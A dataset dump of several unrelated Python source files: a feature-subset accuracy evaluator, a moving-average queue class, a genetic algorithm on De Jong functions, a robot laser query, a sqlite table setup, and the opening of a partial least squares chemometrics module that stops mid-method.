index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
993,500 | dc2427655490bc3521cad798225289acaabf3ce5 | import pandas as pd
from evaluation import features, evaluation
# Evaluate pre-computed best feature subsets (one 0/1 inclusion mask per
# dataset) and report the resulting 1-NN accuracy for each dataset.
datasets = [
    "wine.csv",
    "ionosphere.csv",
    "movement_libras.csv",
    "SCADI.csv",
    "parkinsons.csv",
    # "sonar.csv",
    # "vehicle.csv"
]
solutions = [
    [0, 0, 0, 0, 0, 1, 1, 1, 0, 1, 0, 1, 0],
    [0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0],
    [0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0],
    [0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 0, 1, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
    [0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0]
]
for name, mask in zip(datasets, solutions):
    frame = pd.read_csv("datasets/" + name)
    # Column 0 is the label; the rest are features.
    y = frame.iloc[:, 0].to_numpy()
    x = frame.iloc[:, 1:].to_numpy()
    # Regularisation weight shrinks with the digit count of the feature total.
    lambda_ = 10 ** (-1 * (len(str(len(x[0])))))
    x_best = features(x, mask)
    fit, acc = evaluation(x_best, y, lambda_, k=1)
    print("\n{} best : Accuracy = {}%\n".format(name, round(acc * 100, 2)))
print() |
993,501 | e0e7b98e72fa47b146e749f39f0cb343a52e14c8 |
# 스트리밍 데이터의 이동 평균
#
# 정수 데이터가 스트리밍으로 (한번에 하나씩) 주어진다고 합시다. 이때, 주어진 범위 만큼의 이동 평균을 구하는 클래스 MovingAvg를 만들어 봅시다.
#
# MovingAvg는 처음에 이동 평균의 범위를 입력받아서 초기화 되며, 매 정수 데이타가 입력되는 nextVal(num)함수는 이때까지의 이동 평균을 반환합니다.
#
# 예를 들어서, 2,8,19,37,4,5 의 순서로 데이터가 입력되고, 이동 평균의 범위는 3이라고 합시다. 이 경우 다음과 같이 MovingAvg가 사용 될 것입니다.
# ma = MovingAvg(3)
# print(ma.nextVal(2))
# 현재까지 입력된 값이 2밖에 없으므로, 2를 반환합니다.
import queue
# 1. 배열을 큐로 활용
# 시간 복잡도 : O(N)
# class MovingAvg():
# def __init__(self, size):
# self.size = size
# self.lst = []
#
# def nextVal(self, num):
# self.lst.insert(0, num)
# if len(self.lst) > self.size:
# self.lst.pop()
#
# return sum(self.lst) / len(self.lst)
# 2. 매번 sum() 해줄 필요 없이 시작, 끝의 갑을 뺴고 더해주는 sum 변수를 만듬
# class MovingAvg():
# def __init__(self, size):
# self.size = size
# self.lst = []
# self.sum = 0
#
# def nextVal(self, num):
# self.lst.insert(0, num)
# self.sum += num
# if len(self.lst) > self.size:
# popNumber = self.lst.pop()
# self.sum -= popNumber
#
# return self.sum / len(self.lst)
# queue 라이브러리 사용
class MovingAvg():
    """Streaming moving average over the most recent `size` values.

    Backed by queue.Queue plus a running total, so each update is O(1)
    instead of re-summing the window.
    """

    def __init__(self, size):
        self.size = size          # window length
        self.q = queue.Queue()    # values currently inside the window
        self.sum = 0              # running total of the window contents

    def nextVal(self, num):
        """Push `num` into the window and return the current average."""
        self.q.put(num)
        self.sum += num
        # Evict the oldest value once the window overflows.
        if self.q.qsize() > self.size:
            self.sum -= self.q.get()
        return self.sum / self.q.qsize()
def queueExample():
    """Demonstrate FIFO behaviour of queue.Queue (prints size, then value, twice)."""
    demo = queue.Queue()
    for value in (5, 9):
        demo.put(value)
    while not demo.empty():
        print(demo.qsize())
        print(demo.get())
def main():
    """Run the queue demo, then feed a fixed series through MovingAvg(3)."""
    queueExample()
    window = MovingAvg(3)
    results = [window.nextVal(v) for v in [2, 8, 19, 37, 4, 5]]
    print(results)  # [2.0, 5.0, 9.666666666666666, 21.333333333333332, 20.0, 15.333333333333334]
if __name__ == "__main__":
main() |
993,502 | f901f6a5d586bc716d36f18d66c936b719a7fe4f | ###################################################################################################################################################
# filename: ga.py
# author: Sara Davis
# date: 10/1/2018
# version: 1.0
# description: Generic Genetic Algorithm
###################################################################################################################################################
import random
import numpy as np
import sys
from numpy.random import choice
import csv
np.set_printoptions(threshold=sys.maxsize)
import matplotlib.pyplot as plt
###########################################################################################################
# def generate_chromosome()
# Generate a 16 random 0's or 1's, return that as the chromosome
# inputs: X, K
# returns: centers (cluster centers)
############################################################################################################
def generate_chromosome():
    """Return one 16-gene chromosome: a numpy array of random 0/1 values."""
    return np.asarray([random.randint(0, 1) for _ in range(16)])
###########################################################################################################
# def generate_individual(num_chain)
# Chain together a series of chromosomes to form an individual
# inputs: num_chain
# returns: individual
############################################################################################################
def generate_individual(num_chain):
    """Chain `num_chain` 16-bit chromosomes into one flat individual of 16*num_chain genes."""
    chromosomes = [generate_chromosome() for _ in range(num_chain)]
    return np.asarray(chromosomes).reshape(16 * num_chain)
###########################################################################################################
# def generate_population1()
# Generate an individual with 3 chained chromosomes, and form a population of 100
# inputs: None
# returns: population
############################################################################################################
def generate_population1():
    """Population of 100 individuals with 3 chained chromosomes (48 bits) each."""
    return np.asarray([generate_individual(3) for _ in range(100)])
###########################################################################################################
# def generate_population1()
# Generate an individual with 2 chained chromosomes, and form a population of 100
# inputs: None
# returns: population
############################################################################################################
def generate_population2():
    """Population of 100 individuals with 2 chained chromosomes (32 bits) each."""
    return np.asarray([generate_individual(2) for _ in range(100)])
###########################################################################################################
# def generate_population1()
# Generate an individual with 5 chained chromosomes, and form a population of 100
# inputs: None
# returns: population
############################################################################################################
def generate_population3():
    """Population of 100 individuals with 5 chained chromosomes (80 bits) each."""
    return np.asarray([generate_individual(5) for _ in range(100)])
###########################################################################################################
# def generate_population1()
# Generate an individual with 30 chained chromosomes, and form a population of 100
# inputs: None
# returns: population
############################################################################################################
def generate_population4():
    """Population of 100 individuals with 30 chained chromosomes (480 bits) each."""
    return np.asarray([generate_individual(30) for _ in range(100)])
###########################################################################################################
# def calculate_first_dejong(population)
# Use the first dejong funciton to evaluate the fitness of the chromosome
# inputs: population
# returns: sumall
############################################################################################################
def calculate_first_dejong(population):
    """Fitness for De Jong 1 (sphere): 81 - sum(x_k^2) over 3 variables.

    Each individual encodes three 16-bit chromosomes; each is decoded to a
    value in [-5.12, 5.12). Higher fitness is better (maximisation form).

    Fix: the original sliced bits 17:32 and 33:, silently dropping bit 16
    and bit 32 of every individual. Chromosomes are contiguous 16-bit
    fields, as calculate_third_dejong already assumes (16:32, 32:48).

    :param population: int array, shape (n_individuals, 48)
    :return: float array of fitness values, shape (n_individuals,)
    """
    powers = 2 ** np.arange(16)[::-1]  # big-endian bit weights
    sumAll = np.full(population.shape[0], 81.0)
    for k in range(3):
        gene = population[:, 16 * k:16 * (k + 1)].dot(powers)
        x = 5.12 * 2 / (2 ** 16) * gene - 5.12
        sumAll -= x * x
    return sumAll
###########################################################################################################
# def calculate_second_dejong(population)
# Use the second dejong funciton to evaluate the fitness of the chromosome
# inputs: population
# returns: val
############################################################################################################
def calculate_second_dejong(population):
    """Fitness for De Jong 2 (Rosenbrock): 3906 - (100*(x1^2 - x2)^2 + (1 - x1)^2).

    Each individual encodes two 16-bit chromosomes decoded to [-2.048, 2.048).
    Higher fitness is better (maximisation form; offset was 420 previously).

    Fix: the original sliced the second chromosome as 17:32 (15 bits),
    dropping bit 16; chromosomes are contiguous 16-bit fields.

    :param population: int array, shape (n_individuals, 32)
    :return: float array of fitness values, shape (n_individuals,)
    """
    powers = 2 ** np.arange(16)[::-1]  # big-endian bit weights
    x1 = 2.048 * 2 / (2 ** 16) * population[:, :16].dot(powers) - 2.048
    x2 = 2.048 * 2 / (2 ** 16) * population[:, 16:32].dot(powers) - 2.048
    return 3906 - ((100 * (x1 ** 2 - x2) ** 2) + (1 - x1) ** 2)
###########################################################################################################
# def calculate_third_dejong(population)
# Use the third dejong funciton to evaluate the fitness of the chromosome
# inputs: population
# returns: sumAll
############################################################################################################
def calculate_third_dejong(population):
    """Fitness for De Jong 3 (step function): 26 + sum(int(x_k)) over 5 variables.

    Each individual encodes five 16-bit chromosomes decoded to [-5.12, 5.12);
    astype(int) truncates toward zero, giving the step behaviour.

    :param population: int array, shape (n_individuals, 80)
    :return: float array of fitness values, shape (n_individuals,)
    """
    acc = np.zeros(population.shape[0])
    # Slices mirror the original exactly (last field runs to the end).
    for start, stop in ((0, 16), (16, 32), (32, 48), (48, 64), (64, None)):
        segment = population[:, start:stop]
        gene = segment.dot(2 ** np.arange(segment.shape[1])[::-1])
        x = 5.12 * 2 / (2 ** 16) * gene - 5.12
        acc += x.astype(int)
    return (26 + acc).astype(float)
###########################################################################################################
# def calculate_fourth_dejong(population)
# Use the fourth dejong funciton to evaluate the fitness of the chromosome
# inputs: population
# returns: sumAll
############################################################################################################
def calculate_fourth_dejong(population):
    """Fitness for De Jong 4 (weighted quartic): 1250 - sum(k * x_k^4), k = 1..30.

    Each individual encodes thirty 16-bit chromosomes decoded to
    [-1.28, 1.28). Higher fitness is better (maximisation form).
    The original noise term (np.random.randn) remains disabled,
    matching the commented-out code it replaces.

    Fix: the original hand-unrolled 30 slices and introduced numerous
    off-by-one / wrong-width boundaries (e.g. 17:32 = 15 bits,
    49:54 = 5 bits, 215:231 = 16 bits starting one late), dropping or
    misaligning genes. Chromosomes are contiguous 16-bit fields at
    offsets 16*k.

    :param population: int array, shape (n_individuals, 480)
    :return: float array of fitness values, shape (n_individuals,)
    """
    powers = 2 ** np.arange(16)[::-1]  # big-endian bit weights
    total = np.zeros(population.shape[0])
    for k in range(30):
        gene = population[:, 16 * k:16 * (k + 1)].dot(powers)
        x = 1.28 * 2 / (2 ** 16) * gene - 1.28
        total += (k + 1) * np.power(x, 4)
    return 1250 - total
###########################################################################################################
# def proportional_distribution(population, sumAll)
# calculate the proportional distribution selection
# inputs: population, sumAll
# returns: newPop
############################################################################################################
def proportional_distribution(population, sumAll):
    """Roulette-wheel (fitness-proportional) selection.

    Draws 100 individuals with replacement, each row's probability being
    its fitness divided by the population total.

    :param population: array, shape (100, n_bits)
    :param sumAll: fitness values, shape (100,)
    :return: new population array, shape (100, n_bits)
    """
    weights = list(sumAll / np.sum(sumAll))
    indices = list(range(100))
    picked = [choice(indices, p=weights) for _ in indices]
    return np.asarray([population[idx, :] for idx in picked])
###########################################################################################################
# def crossover(population, rate)
# Perform crossover
# inputs: population, sumAll
# returns: l
############################################################################################################
def crossover(population, rate):
    """Single-point crossover over consecutive pairs of individuals.

    With probability `rate`, each pair (2i, 2i+1) swaps tails at a random
    cut point in [2, 46]; otherwise both parents pass through unchanged.

    :param population: array, shape (100, n_bits)
    :param rate: crossover probability Px
    :return: offspring array, shape (100, n_bits)
    """
    offspring = []
    for i in range(0, 100, 2):
        do_cross = choice([0, 1], p=[1 - rate, rate])
        if do_cross == 1:
            cut = random.randint(2, 46)
            child_a = np.concatenate((population[i, :cut], population[i + 1, cut:]), None)
            child_b = np.concatenate((population[i + 1, :cut], population[i, cut:]), None)
        else:
            child_a = population[i]
            child_b = population[i + 1]
        offspring.append(child_a)
        offspring.append(child_b)
    return np.asarray(offspring)
###########################################################################################################
# def mutate(population, rate)
# Perform mutation
# inputs: population, rate
# returns: mutPop
############################################################################################################
def mutate(population, rate):
    """Bit-flip mutation: each gene flips independently with probability `rate`.

    Fix: the original assigned `mutPop = population`, which is an alias,
    so the caller's array was mutated in place while the function also
    pretended to return a fresh array. A copy is now taken, leaving the
    input untouched; the returned values are unchanged.

    :param population: 0/1 int array, shape (100, n_bits); not modified
    :param rate: per-gene mutation probability Pm
    :return: mutated copy of the population
    """
    mutPop = population.copy()  # was: mutPop = population (aliasing bug)
    for i in range(100):
        for j in range(len(population[0])):
            if choice([0, 1], p=[1 - rate, rate]) == 1:
                # genes are 0/1, so 1 - g flips the bit
                mutPop[i, j] = 1 - mutPop[i, j]
    return mutPop
###########################################################################################################
# def calculate(sumAll, e, avMin, avAv, avMax)
# Calculate the statistics
# inputs: sumAll, e, avMin, avAv, avMax
# returns: nothing
############################################################################################################
def calculate(sumAll, e, avMin, avAv, avMax):
    """Record per-generation fitness stats into the running lists (in place).

    On the first run (lists shorter than 50 generations) values are
    appended; on later runs they are accumulated at generation index `e`
    so `average` can divide by the run count afterwards.
    """
    gen_min = np.min(sumAll)
    gen_max = np.max(sumAll)
    gen_avg = np.mean(sumAll)
    if len(avAv) < 50:
        avMin.append(gen_min)
        avMax.append(gen_max)
        avAv.append(gen_avg)
    else:
        avMin[e] += gen_min
        avMax[e] += gen_max
        avAv[e] += gen_avg
###########################################################################################################
# def average(avMin, avMax, avAv)
# Calculate averages
# inputs: avMin, avMax, avAv
# returns: nothing
############################################################################################################
def average(avMin, avMax, avAv):
    """Divide accumulated per-generation stats by the 30 runs, in place."""
    for idx in range(len(avMax)):
        for series in (avMin, avMax, avAv):
            series[idx] = series[idx] / 30
###########################################################################################################
# def plot(avMin, avMax, avAv, px, pm, dejong)
# plot stuff
# inputs: avMin, avMax, avAv, px, pm, dejong
# returns: nothing
############################################################################################################
def plot(avMin, avMax, avAv, px, pm, dejong):
    """Plot average min/mean/max fitness per generation for one (Px, Pm) setting."""
    generations = list(range(1, 51))
    fig = plt.figure()
    axes = fig.add_subplot(1, 1, 1)
    axes.plot(generations, avMin, label='Av Min')
    axes.plot(generations, avMax, label='Av Max')
    axes.plot(generations, avAv, label='Av Av')
    plt.xlabel('Generation')
    plt.ylabel('Average Fitness')
    plt.title(dejong + 'Fitnesses Px: ' + str(px) + ' Pm: ' + str(pm))
    plt.legend()
    plt.show()
###########################################################################################################
# def first(pop)
# run first dejong
# inputs: pop
# returns: nothing
############################################################################################################
def first(pop):
    """Run the GA on De Jong 1: 5 (Px, Pm) settings x 30 runs x 50 generations.

    Results are logged to first_dejong.csv and the averaged min/mean/max
    fitness curves are plotted per setting.

    Fixes: `run` was never reset between parameter settings, so only the
    first (Px, Pm) pair actually executed its 30 runs — later iterations
    skipped the loop and replotted stale data. The stats lists are now
    also reset per setting (otherwise `average` would re-divide old
    totals). The unused `val` locals were removed.
    """
    with open('first_dejong.csv', mode='w') as write:
        writer = csv.writer(write, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
        px = [.7, .7, .7, .3, 1]
        pm = [.001, .01, .0001, .001, .001]
        for i in range(len(px)):
            run = 0        # reset per setting (bug fix)
            avMin = []     # fresh accumulators per setting (bug fix)
            avAv = []
            avMax = []
            while run < 30:
                e = 0
                while e < 50:
                    sumAll = calculate_first_dejong(pop)
                    calculate(sumAll, e, avMin, avAv, avMax)
                    writer.writerow([e] + [px[i]] + [pm[i]])
                    writer.writerow(sumAll)
                    pop = proportional_distribution(pop, sumAll)
                    pop = crossover(pop, px[i])
                    pop = mutate(pop, pm[i])
                    e += 1
                writer.writerow([])
                run += 1
            average(avMin, avMax, avAv)
            plot(avMin, avMax, avAv, px[i], pm[i], 'Dejong 1 ')
###########################################################################################################
# def second(pop)
# run second dejong
# inputs: pop
# returns: nothing
############################################################################################################
def second(pop):
    """Run the GA on De Jong 2: 5 (Px, Pm) settings x 30 runs x 50 generations.

    Results are logged to second_dejong.csv; averaged fitness curves are
    plotted per setting.

    Fix: `run` and the stats lists are now reset for every (Px, Pm)
    setting — previously only the first setting executed and later plots
    redrew stale data.
    """
    with open('second_dejong.csv', mode='w') as write:
        writer = csv.writer(write, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
        px = [.7, .7, .7, .3, 1.00]
        pm = [.001, .01, .0001, .001, .001]
        for i in range(len(px)):
            run = 0        # reset per setting (bug fix)
            avMin = []     # fresh accumulators per setting (bug fix)
            avAv = []
            avMax = []
            while run < 30:
                e = 0
                while e < 50:
                    sumAll = calculate_second_dejong(pop)
                    calculate(sumAll, e, avMin, avAv, avMax)
                    writer.writerow([e] + [px[i]] + [pm[i]])
                    writer.writerow(sumAll)
                    pop = proportional_distribution(pop, sumAll)
                    pop = crossover(pop, px[i])
                    pop = mutate(pop, pm[i])
                    e += 1
                run += 1
            average(avMin, avMax, avAv)
            plot(avMin, avMax, avAv, px[i], pm[i], 'Dejong 2 ')
###########################################################################################################
# def third(pop)
# run third dejong
# inputs: pop
# returns: nothing
############################################################################################################
def third(pop):
    """Run the GA on De Jong 3: 5 (Px, Pm) settings x 30 runs x 50 generations.

    Results are logged to third_dejong.csv; averaged fitness curves are
    plotted per setting.

    Fix: `run` and the stats lists are now reset for every (Px, Pm)
    setting — previously only the first setting executed and later plots
    redrew stale data.
    """
    with open('third_dejong.csv', mode='w') as write:
        writer = csv.writer(write, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
        px = [.7, .7, .7, .3, 1]
        pm = [.001, .01, .0001, .001, .001]
        for i in range(len(px)):
            run = 0        # reset per setting (bug fix)
            avMin = []     # fresh accumulators per setting (bug fix)
            avAv = []
            avMax = []
            while run < 30:
                e = 0
                while e < 50:
                    sumAll = calculate_third_dejong(pop)
                    calculate(sumAll, e, avMin, avAv, avMax)
                    writer.writerow([e] + [px[i]] + [pm[i]])
                    writer.writerow(sumAll)
                    pop = proportional_distribution(pop, sumAll)
                    pop = crossover(pop, px[i])
                    pop = mutate(pop, pm[i])
                    e += 1
                run += 1
            average(avMin, avMax, avAv)
            plot(avMin, avMax, avAv, px[i], pm[i], 'Dejong 3 ')
###########################################################################################################
# def fourth(pop)
# run fourth dejong
# inputs: pop
# returns: nothing
############################################################################################################
def four(pop):
    """Run the GA on De Jong 4: 5 (Px, Pm) settings x 30 runs x 50 generations.

    Results are logged to four_dejong.csv; averaged fitness curves are
    plotted per setting.

    Fix: `run` and the stats lists are now reset for every (Px, Pm)
    setting — previously only the first setting executed and later plots
    redrew stale data.
    """
    with open('four_dejong.csv', mode='w') as write:
        writer = csv.writer(write, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
        px = [.7, .7, .7, .3, 1]
        pm = [.001, .01, .0001, .001, .001]
        for i in range(len(px)):
            run = 0        # reset per setting (bug fix)
            avMin = []     # fresh accumulators per setting (bug fix)
            avAv = []
            avMax = []
            while run < 30:
                e = 0
                while e < 50:
                    sumAll = calculate_fourth_dejong(pop)
                    calculate(sumAll, e, avMin, avAv, avMax)
                    writer.writerow([e] + [px[i]] + [pm[i]])
                    writer.writerow(sumAll)
                    pop = proportional_distribution(pop, sumAll)
                    pop = crossover(pop, px[i])
                    pop = mutate(pop, pm[i])
                    e += 1
                run += 1
            average(avMin, avMax, avAv)
            plot(avMin, avMax, avAv, px[i], pm[i], 'Dejong 4 ')
def main():
    """Run all four De Jong experiments, each on a freshly generated population."""
    experiments = (
        (generate_population1, first),
        (generate_population2, second),
        (generate_population3, third),
        (generate_population4, four),
    )
    for build_population, run_experiment in experiments:
        run_experiment(build_population())


if __name__ == "__main__":
    main()
|
993,503 | 6401f65be4227670e04e8e5cf200f26968afabe9 | from robot_control_class import RobotControl
# Query the robot's laser scanner at a user-chosen beam index and print it.
rc = RobotControl()
# Prompt suggests a 720-beam scan (indices 0-719); no validation is done
# here, so out-of-range input is passed straight to get_laser.
num = int(input("Enter a number between 0 and 719 "))
laser = rc.get_laser(num)
# NOTE(review): %d truncates to an integer — laser ranges are typically
# floats; confirm whether %f or %s was intended.
print("Laser distance is %d meters" % laser)
|
993,504 | 8cd6a154eb819bfab0d0491f187cf7befb6dddb2 | import sqlite3
# Create the 'computers' table in db.sqlite3 (id primary key, brand text).
conn = sqlite3.connect('db.sqlite3')
print ("Opened database successfully")
# Fix: IF NOT EXISTS makes the script idempotent — the original raised
# sqlite3.OperationalError ("table computers already exists") on every
# run after the first.
conn.execute('CREATE TABLE IF NOT EXISTS computers (id INTEGER PRIMARY KEY,brand TEXT)')
conn.commit()  # make the DDL durable regardless of connection isolation settings
conn.close() |
993,505 | 342e6801da125e5fc8fedcf3124c4f52ceb5bc8b | # -*- coding: utf-8 -*-
"""
@author: JiangSu
Email: jiangsukust@163.com
============================= pypls =============================
Provides
1. PartialLeastSquares(CrossValidation, ValsetValidation, Prediction)
-- CrossValidation, cv
-- ValsetValidation, vv
-- Prediction, predict
++ It should be pointed out that before using 'predict', 'cv' or 'vv' must be run first.
Take 'cv' for example, its outputs include 'cv_result' and 'cal_result'.
Assume the DataSet consists of 80 spectra, 700 wavelength points, the max num of latent variable is 5.
The cal_result's outputs are as following:
'cal_result' including:
'b': (回归系数,(700,5))
't2_limit': (t2阈值,(6,5))
'leverage_limit': (杠杆值阈值,(5,))
'q_limit': (Q残差阈值,(6,5),最后一列nan)
't_critical_value': (y学生化残差阈值,(6,5))
'r2': (决定系数R2,(5,))
'press': (预测残差平方和,(5,))
'rmsec': (RMSEC校正均方根误差,(5,))
'sec': (SEC校正标准偏差,(5,))
'rpd': (RPD,(5,))
'bias': (Bias,(5,))
'x_loadings': (X载荷,(700,5))
'x_scores_weights': (X权重,(700,5))
'linear_regression_coefficient': (包含斜率Slope和截距Offset,(2,5))
'fitting_x_list': (list, 每个元素代表1个隐变量下的拟合光谱矩阵)
'residual_matrix_list': (list, 每个元素代表1个隐变量下的残差光谱矩阵)
'fit_value': (拟合值,(80,5))
'y_residual': (拟合残差,(80,5))
'x_residual': (X残差,(80,5))
't2': (T2,(80,5))
'leverage': (Leverage,(80,5))
'x_scores': (X得分,(80,5))
'x_fvalue': (X残差F分布统计量,(80,5))
'x_fprob': (X残差F分布累积概率值,(80,5))
'y_fvalue': (y残差F分布统计量,(80,5))
'y_fprob': (y残差F分布累积概率值,(80,5))
'y_tvalue': (y学生化残差,(80,5)) # 学生化残差
'x_sample_residuals': (80,5)
'x_variable_residuals': (700,5)
'x_total_residuals': (1,5)
'explained_x_sample_variance': (80,5)
'explained_x_variable_variance': (700,5)
'explained_x_total_variance': (1,5)
'explained_x_variance_ratio': (1,5)
'x_outlier_indices_list':
'y_outlier_indices_list':
'just_x_outlier_list':
'just_y_outlier_list':
'both_xy_outlier_list':
2. Three PLS Algorithm:
-- Improved Kernel Partial Least Squares, IKPLS
-- Nonlinear Iterative Partial Least Squares,NIPALS
-- Straightforward Implementation of a statistically inspired Modification of the Partial Least Squares, SIMPLS
3. Several Sampling Algorithm:
-- montecarlo_sampling
-- ks_sampling(Kennard-Stone)
-- spxy_sampling
4. Several Samples split Algorithm:
-- samples_systematic_split
-- samples_ks_split
-- samples_spxy_split
-- samples_random_split
5. Popular Pretreat methods for Spectroscopy
-- Multiplicative Scatter Correction 多元散射校正, MSC
-- Multiplicative Scatter Correction + Savitzky-Golay 多元散射校正+求导, MSCSG
-- Vector Normalization 矢量归一化, VN
-- Standard Normal Variate transformation 标准正态变换, SNV
-- Eliminate Constant Offset 消除常数偏移量, ECO
-- Subtract Straight Line 减去一条直线, SSL
-- De-Trending 去趋势, DT
-- Min-Max Normalization 最小最大归一化, MMN
-- Savitzky-Golay 平滑与求导, SG
-- SNV + Savitzky-Golay, SNVSG
-- SNV + DT, SNVDT
-- SSL + SG, SSLSG
-- Mean Centering 均值中心化, MC
-- Zscore Standardization 标准化, ZS
"""
import numpy as np
from numpy import diag, cumsum, where, dot, outer, zeros, sqrt, mean, sum, min, square, inner
from numpy.linalg import inv, norm
import scipy.stats as sps
from scipy.spatial.distance import pdist, squareform
# ================ PartialLeastSquares Class (Main)================
class PartialLeastSquares(object):
'''
Including 3 important functions, which are 'cv'(CrossValidation), 'vv'(ValsetValidation) and 'predict'(Prediction).
It should be pointed out that before 'predict', 'cv' or 'vv' must be run first.
'''
def __init__(self,
algorithm='ikpls_algorithm',
max_nlv=10,
pretreat_method1='SG',
pretreat_params1=None,
pretreat_method2='MC',
customized_regions=[[4000,6000], [5000, 8000]]
):
self.algorithm = algorithm
self.max_nlv = max_nlv
self.pretreat_method1 = pretreat_method1
if pretreat_params1 is None:
self.pretreat_params1 = {}
else:
self.pretreat_params1 = pretreat_params1
if pretreat_method1 is None:
self.pretreat_params1 = {}
self.pretreat_method2 = pretreat_method2
self.customized_regions = customized_regions
self.significance_level = [0.001, 0.005, 0.01, 0.05, 0.1, 0.25]
return
def _sec_calc(self, fit_value, reference_value):
    '''
    Compute calibration statistics from fitted vs. reference values.

    Only valid for calibration (fitted values against their own
    reference values) — not for cross-validation predictions.

    :param fit_value: fitted values, (n_samples, max_nlv) or 1-D
    :param reference_value: reference values, (n_samples,) or (n_samples, 1)
    :return: dict with 'r2', 'rmsec', 'sep', 'sec', 'press', 'rpd',
             'bias', 'linear_regression_coefficient' (slope/offset per
             latent variable) and 'relative_error'
    '''
    if fit_value.ndim == 1:
        fit_value = fit_value[:, np.newaxis]  # promote 1-D input to a column matrix
    if reference_value.ndim == 1:
        reference_value = reference_value[:, np.newaxis]  # promote 1-D input to a column matrix
    max_nlv = fit_value.shape[1]
    n_samples = reference_value.shape[0]
    error = fit_value - reference_value
    # Error Sum of Squares (SSE), a.k.a. PRESS here
    press = np.sum(error * error, axis=0)
    rmsec = sqrt(press / n_samples)
    # Total Sum Of Squares (SST): total deviation of the reference values
    sst = np.sum((reference_value - mean(reference_value)) ** 2)
    # Regression Sum of Squares (SSR) (1, 10)
    ssr = np.sum((fit_value - mean(reference_value)) ** 2, axis=0)
    # SST = SSR + SSE
    # r2 = ssr / sst = 1 - sse / sst
    # r2 = ssr / sst
    r2 = 1 - press / sst
    sd = sqrt(sst / (n_samples - 1))  # standard deviation of the reference values
    # sd = np.std(reference_value, axis=0, ddof=1)
    bias = np.mean(error, axis=0)
    # ------------- linear regression of the data (x: reference_value, y: fit_value)
    # linear_regression_coefficient (2, max_nlv) slope, intercept
    linear_regression_coefficient = zeros((2, max_nlv))
    # -------------- Standard Error of Calibration (SEC, degrees-of-freedom corrected)
    sec = zeros(self.max_nlv)
    for i in range(self.max_nlv):
        nlv = i + 1
        if self.pretreat_method2 is not None:
            # mean centering consumes one extra degree of freedom
            df = n_samples - nlv - 1
        else:
            df = n_samples - nlv
        e = error[:, i]
        sec_lv = sqrt(np.sum(e * e, axis=0) / df)
        sec[i] = sec_lv
        # `lsr` is a module-level least-squares helper defined elsewhere in this file
        reg_coeff = lsr(reference_value, fit_value[:, i], order=1)['regression_coefficient']
        linear_regression_coefficient[:, i] = reg_coeff.ravel()
    # ------------ Standard Error of Prediction (SEP); refer to OPUS, User friendly
    SEP = sqrt((np.sum((error - bias) * (error - bias), axis=0)) / (n_samples - 1))
    rpd = sd / SEP
    # NOTE(review): relative error divides by the raw reference values —
    # references at or near zero will blow this up; confirm inputs are nonzero.
    relative_error = np.abs(error) / reference_value
    return {'r2': r2, 'rmsec': rmsec, 'sep': SEP, 'sec': sec, 'press': press, 'rpd': rpd, 'bias': bias,
            'linear_regression_coefficient': linear_regression_coefficient,
            'relative_error': relative_error}
def _spec_target_pretreat(self, spec, target):
    '''
    Fit both pretreatment stages on calibration data and return the
    pretreated spectra and target values.

    Side effects: stores the fitted pretreatment instances
    (pretreat4spec1/2, pretreat4target) and the calibration statistics
    (calx_pretreated1_mean/stdev, caly_mean/stdev) on self for later use
    by the transform/inverse-transform helpers.

    :param spec: calibration spectra matrix (n_samples, n_wavelengths)
    :param target: calibration target values
    :return: (pretreated spectra, pretreated target)
    '''
    # ----------------- pretreat1 -----------------
    if self.pretreat_method1 is not None:
        # NOTE(review): eval() builds the pretreatment class from its configured
        # name (e.g. 'SG') — safe only while method names come from trusted config.
        self.pretreat4spec1 = eval(self.pretreat_method1.upper())(**self.pretreat_params1)  # class instance
        spec_pretreated1 = self.pretreat4spec1.fit_transform(spec)
    else:
        self.pretreat4spec1 = 'None'
        spec_pretreated1 = spec
    # Save mean/stdev of the stage-1 pretreated spectra, to pretreat
    # unknown samples at stage 2 later.
    # NOTE(review): the [1:, :] slice excludes row 0 from the statistics —
    # confirm whether skipping the first calibration spectrum is intentional.
    self.calx_pretreated1_mean = np.mean(spec_pretreated1[1:, :], axis=0)
